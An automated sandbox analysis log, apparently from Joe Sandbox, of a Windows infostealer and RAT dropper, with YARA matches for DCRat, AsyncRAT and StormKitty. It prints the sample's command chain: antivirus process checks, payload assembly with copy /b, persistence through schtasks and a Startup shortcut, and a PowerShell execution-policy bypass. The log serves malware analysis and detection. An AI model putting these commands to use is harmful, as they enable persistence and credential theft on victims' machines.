                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A2A7036_2_00007FF7C70A2A70
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709BE7036_2_00007FF7C709BE70
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709227036_2_00007FF7C7092270
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70EA67036_2_00007FF7C70EA670
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A069036_2_00007FF7C70A0690
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709A69036_2_00007FF7C709A690
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709B6B036_2_00007FF7C709B6B0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70CFED036_2_00007FF7C70CFED0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70CFAC036_2_00007FF7C70CFAC0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70976F436_2_00007FF7C70976F4
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A353036_2_00007FF7C70A3530
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D053036_2_00007FF7C70D0530
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A115036_2_00007FF7C70A1150
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70EA15036_2_00007FF7C70EA150
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7092D7036_2_00007FF7C7092D70
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70E79B036_2_00007FF7C70E79B0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C711DDC036_2_00007FF7C711DDC0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C71201C036_2_00007FF7C71201C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7097DA036_2_00007FF7C7097DA0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A01A136_2_00007FF7C70A01A1
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70D25A036_2_00007FF7C70D25A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709C1BD36_2_00007FF7C709C1BD
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70E75F036_2_00007FF7C70E75F0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C70A31F336_2_00007FF7C70A31F3
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C709C61036_2_00007FF7C709C610
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 37_2_000001FD69201D0337_2_000001FD69201D03
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 37_2_000001FD69202BE737_2_000001FD69202BE7
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 37_2_000001FD6920213337_2_000001FD69202133
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\353090\Seat.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: String function: 004062A3 appears 57 times
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: String function: 00380DA0 appears 46 times
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: String function: 0037FD52 appears 40 times
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: String function: 00007FF7C70A31F3 appears 39 times
                  Source: ADFoyxP.exeStatic PE information: invalid certificate
                  Source: curcuma.exe.30.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
                  Source: curcuma.exe.30.drStatic PE information: Number of sections : 11 > 10
                  Source: ADFoyxP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000024.00000002.2543057851.00007FF7C7371000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 00000025.00000002.2542566206.000001FD691D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: ADFoyxP.exeStatic PE information: Section: .reloc ZLIB complexity 1.002197265625
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@122/307@30/23
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D41FA GetLastError,FormatMessageW,27_2_003D41FA
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,27_2_003C2010
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C1A0B AdjustTokenPrivileges,CloseHandle,27_2_003C1A0B
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,27_2_003CDD87
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003D3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,27_2_003D3A0E
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure InnovationsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeMutant created: \Sessions\1\BaseNamedObjects\filemanager1
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\KzwgQiLBsKNC8MJ0zZKWm7EQADmHtlQcAqGCr8Sw14/KL57tXLJJZTjsUP4ab24f22LPEwrDGtXSF6zdOKZ5wg==
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\nsuDD66.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                  Source: ADFoyxP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSystem information queried: HandleInformation
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: curcuma.exe, 00000024.00000003.2231123152.000002428F038000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ADFoyxP.exeVirustotal: Detection: 27%
                  Source: ADFoyxP.exeReversingLabs: Detection: 13%
                  Source: C:\Users\user\Desktop\ADFoyxP.exeFile read: C:\Users\user\Desktop\ADFoyxP.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\ADFoyxP.exe "C:\Users\user\Desktop\ADFoyxP.exe"
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,5305006061332576876,17319552954880503810,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6988 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pubJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
